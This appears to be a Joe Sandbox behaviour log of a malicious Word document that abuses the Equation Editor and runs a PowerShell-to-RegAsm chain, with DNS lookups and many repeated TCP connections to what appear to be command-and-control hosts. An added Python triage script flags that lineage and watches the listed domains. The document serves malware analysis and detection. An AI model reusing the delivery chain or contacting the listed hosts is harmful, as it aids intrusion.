                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_10006580 FindFirstFileExA,12_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                    Software Vulnerabilities

                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Source: C:\Windows\SysWOW64\wscript.exe, Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global traffic, DNS query: name: zeep.ly (5 identical entries)
                    Source: global traffic, DNS query: name: ia601706.us.archive.org
                    Source: global traffic, DNS query: name: dremom2.duckdns.org
                    Source: global traffic, DNS query: name: geoplugin.net
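The process-creation, DNS and TCP-traffic entries in this section are exactly the raw material an analyst feeds into a first-pass triage script. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses plain-text lines of the shape shown here (tolerating the run-together "Source: <origin><event>" form produced by the text export), flags the WINWORD.EXE -> EQNEDT32.EXE and wscript.exe -> powershell.exe -> RegAsm.exe lineage, counts DNS lookups of the domains resolved above, and collapses repeated identical TCP flows to one line with a count. The sample lines are constructed from this report's own entries; the watch-list suffixes, the parent/child pair table and its descriptions are the example's own assumptions, not a vendor feed or a Joe Sandbox signature.

```python
"""Triage of Joe Sandbox 'Source: ...' behaviour lines (added example)."""
import re
from collections import Counter

# Constructed sample input, copied in shape from this report's own lines,
# including the run-together 'Source: <origin><event>' form.
SAMPLE_LINES = [
    r"Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
    r"Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    "Source: global trafficDNS query: name: zeep.ly",
    "Source: global trafficDNS query: name: zeep.ly",
    "Source: global trafficDNS query: name: dremom2.duckdns.org",
    "Source: global trafficDNS query: name: geoplugin.net",
    "Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443",
    "Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443",
    "Source: global trafficTCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80",
]

# Non-greedy parent path up to its '.exe', then the event keyword that the
# text export glues directly onto it (an optional ', ' or space is accepted
# so cleaned-up lines parse too).
PROC_RE = re.compile(
    r"^Source: (?P<parent>.+?\.exe)[,\s]*(?:Process created|Child): (?P<child>.+\.exe)$", re.I)
DNS_RE = re.compile(r"^Source: global traffic[,\s]*DNS query: name: (?P<name>\S+)$")
TCP_RE = re.compile(r"^Source: global traffic[,\s]*TCP traffic: (?P<src>\S+) -> (?P<dst>\S+)$")

# Parent/child basenames that are rare on a healthy Office workstation and
# make up the delivery chain in this report (descriptions are the example's).
SUSPICIOUS_PAIRS = {
    ("winword.exe", "eqnedt32.exe"):
        "Word spawned the Equation Editor (CVE-2017-11882 / CVE-2018-0802 pattern)",
    ("wscript.exe", "powershell.exe"):
        "Windows Script Host launched PowerShell",
    ("powershell.exe", "regasm.exe"):
        "PowerShell launched RegAsm.exe, a signed .NET binary used here as the Remcos host process",
}

# Assumed watch-list drawn from the domains resolved in this report
# (dynamic DNS, the zeep.ly domain, and the geolocation service Remcos
# queries at start-up). Tune per environment; this is not a vendor feed.
WATCH_SUFFIXES = ("duckdns.org", "zeep.ly", "geoplugin.net")


def basename(path):
    """Case-folded file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(lines):
    """Return process-chain hits, DNS counts, watched domains and flow counts."""
    hits, dns, flows = [], Counter(), {}   # dict keeps first-seen flow order
    for raw in lines:
        line = raw.strip()
        m = PROC_RE.match(line)
        if m:
            pair = (basename(m["parent"]), basename(m["child"]))
            if pair in SUSPICIOUS_PAIRS:
                hits.append((pair, SUSPICIOUS_PAIRS[pair]))
            continue
        m = DNS_RE.match(line)
        if m:
            dns[m["name"].lower()] += 1
            continue
        m = TCP_RE.match(line)
        if m:
            key = (m["src"], m["dst"])
            flows[key] = flows.get(key, 0) + 1
    watched = {n: c for n, c in dns.items() if n.endswith(WATCH_SUFFIXES)}
    return {"process_hits": hits, "dns": dict(dns), "watched_dns": watched, "flows": flows}


def summarize_flows(flows):
    """Collapse repeated identical flows into 'src -> dst xN' lines, first-seen order."""
    return ["%s -> %s x%d" % (src, dst, n) for (src, dst), n in flows.items()]


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for pair, why in result["process_hits"]:
        print("PROCESS  %s -> %s: %s" % (pair[0], pair[1], why))
    for name, n in result["watched_dns"].items():
        print("DNS      %s (%d lookups)" % (name, n))
    for line in summarize_flows(result["flows"]):
        print("FLOW     " + line)
```

Run it against a text export of the behaviour section (one line per entry) to get the three lineage hits, the watched domains with lookup counts, and the flow list collapsed the way a reviewer would want it rather than one line per packet. The pair table deliberately matches on basenames only, so a renamed or relocated RegAsm.exe is a gap; pair it with a path or signer check in production.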
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
